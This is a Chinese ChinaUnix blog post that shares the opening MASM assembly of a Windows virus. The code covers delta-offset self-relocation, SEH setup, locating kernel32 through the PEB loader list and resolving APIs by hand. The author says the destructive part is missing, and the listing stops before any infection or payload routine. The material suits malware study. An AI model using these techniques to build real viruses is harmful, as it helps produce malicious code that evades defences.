Chinaunix首页 | 论坛 | 博客

rexrock23的ChinaUnix博客

首页 |  博文目录 |  关于我

rexrock23

  • 博客访问: 155386
  • 博文数量: 40
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 410
  • 用 户 组: 普通用户
  • 注册时间: 2014-02-11 09:11
文章分类

全部博文(40)

文章存档

2020年(1)

2017年(36)

2014年(3)

我的朋友
最近访客
推荐博文
相关博文
缺少破坏部的病毒程序

分类: WINDOWS

2017-03-17 19:22:08


点击(此处)折叠或打开

  1. .386
  2. .model flat,stdcall
  3. option casemap:none

  5. include windows.inc
  6. include kernel32.inc
  7. include user32.inc
  8. includelib kernel32.lib
  9. includelib user32.lib

  11. .code
  12. VExit:
  13.     invoke ExitProcess,NULL
  14.     
  15. VIRUS SEGMENT PARA USE32 'VIRUS'
  16. ASSUME CS:VIRUS,DS:VIRUS
  17. ;***************************************************************************
  18. ;****************** 准备工作 *****************************************
  19. ;***************************************************************************
  20. VStart:
  21.     push    ebp
  22.     push    esp
  23.     
  24.     call    GetActualAddr
  25. GetActualAddr:
  26.     pop    ebp
  27.     sub    ebp,GetActualAddr
  28.     
  29.     ;设置SEH
  30.     assume    fs:nothing
  31.     lea    ebx,SEH[ebp]
  32.     push    ebx
  33.     push    fs:[0]
  34.     mov    fs:[0],esp
  35.     mov    oldEsp[ebp],esp
  36.     ;保存程序入口地址
  37.     cmp    old_base[ebp],0
  38.     jnz    @F
  39.     mov    old_base[ebp],400000h
  40. @@:
  41.     cmp    old_in[ebp],0
  42.     jnz    @F
  43.     mov    old_in[ebp],3000h
  44. @@:
  45.     mov    eax,old_base[ebp]
  46.     mov    des_base[ebp],eax
  47.     mov    eax,old_in[ebp]
  48.     mov    des_in[ebp],eax
  49.     ;kernel32基址重定位
  50.     assume    fs:nothing
  51. FindKernel32:
  52.     ;mov esi,fs:[30h]        ;Peb
  53.     ;mov esi,[esi+0ch]        ;LDR
  54.     ;mov esi,[esi+0ch]        ;InLoadOrderModuleList
  55.     ;mov esi,[esi]        ;[_LDR_MODULE.InLoadOrderModuleList].Blink
  56.     ;mov esi,[esi]        ;[_LDR_MODULE.InLoadOrderModuleList].Blink
  57.     ;mov esi,[esi+18h]        ;[_LDR_MODULE.InLoadOrderModuleList]. BaseAddress
  58.     MOV     ESI,FS:[30H]         ; ESI = &(PEB) ([FS:0x30])
  59.     MOV     ESI,[ESI + 0CH]     ; ESI = PEB->Ldr
  60.     MOV     ESI,[ESI + 1CH]     ; ESI = PEB->Ldr.InInitOrder
  61. next_module:
  62.     MOV    EAX, [ESI + 08H]    ; EAX = InInitOrder[X].base_address
  63.     MOV     EDI, [ESI + 20H]     ; EDI = InInitOrder[X].module_name (unicode)
  64.     MOV     ESI, [ESI]         ; ESI = InInitOrder[X].flink (next module)
  65.     CMP     word ptr [EDI + 12*2], 00h     ; modulename[12] == 0 ?
  66.     JNE     next_module         
  67.     MOV     ESI, EAX    
  68. GetPeHeader:
  69.     mov    edi,dword ptr[esi+3ch]
  70.     add    edi,esi
  71.     cmp    word ptr[edi],'EP'
  72.     jnz    short FindKernel32
  73.     mov    vKernel32[ebp],esi
  74. GetPeExportTable:
  75.     mov    ebx,[edi+78h]
  76.     add    ebx,vKernel32[ebp]
  77.     mov    vExportKernel[ebp],ebx
  78.     ;获取API函数GetProcAddress的地址
  79.     push    14
  80.     call    aGetProcAddr
  81.     db    "GetProcAddress",0
  82. aGetProcAddr:
  83.     lea    eax,GetApiAddress[ebp]
  84.     call    eax
  85.     or    eax,eax
  86.     jz    ExitTimes
  87.     mov    vGetProcAddress[ebp],eax
  88.     ;获取API函数GetModuleHandle的地址
  89.     push    15
  90.     call    aGetModHandle
  91.     db    "GetModuleHandle",0
  92. aGetModHandle:
  93.     lea    eax,GetApiAddress[ebp]
  94.     call    eax
  95.     or    eax,eax
  96.     jz    ExitTimes
  97.     mov    vGetModuleHandle[ebp],eax
  98.     ;获取KERNEL32.DLL模块的句柄
  99.     call    MKernel32Dll
  100.     db    "Kernel32.dll",0
  101. MKernel32Dll:
  102.     call    dword ptr vGetModuleHandle[ebp]
  103.     or    eax,eax
  104.     jz    ExitTimes
  105.     mov    Kernel32Handle[ebp],eax    ;调试发现Kernel32Handle=vKernel32
  106.     ;获取其他API函数的地址
  107.     lea    esi,bLoadLibrary[ebp]
  108.     lea    edi,vLoadLibrary[ebp]
  109.     cld
  110. LoopGetFunction:
  111.     lodsd
  112.     add    eax,ebp
  113.     push    eax
  114.     mov    eax,Kernel32Handle[ebp]
  115.     push    eax
  116.     call    dword ptr vGetProcAddress[ebp]
  117.     or    eax,eax
  118.     jz    ExitTimes
  119.     stosd
  120.     cmp    dword ptr[esi],0
  121.     jnz    LoopGetFunction
  122.     ;获取MessageBoxA的地址
  123.     call    MUserDll
  124.     db    "User32.dll",0
  125. MUserDll:
  126.     call    dword ptr vGetModuleHandle[ebp]
  127.     or    eax,eax
  128.     jnz    Right
  129.     call    LUserDll
  130.     db    "User32.dll",0
  131. LUserDll:
  132.     call    dword ptr vLoadLibrary[ebp]
  133.     or    eax,eax
  134.     jz    ExitTimes
  135. Right:
  136.     call    GetMess
  137.     db    "MessageBoxA",0
  138. GetMess:
  139.     push    eax
  140.     call    dword ptr vGetProcAddress[ebp]
  141.     or    eax,eax
  142.     jz    ExitTimes
  143.     mov    vMessageBox[ebp],eax
  144. ;***************************************************************************
  145. ;****************** 开始干活 *****************************************
  146. ;***************************************************************************
阅读(1054) | 评论(0) | 转发(0) |
0

上一篇:内存地址重定位

下一篇:X86_64地址空间分布

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6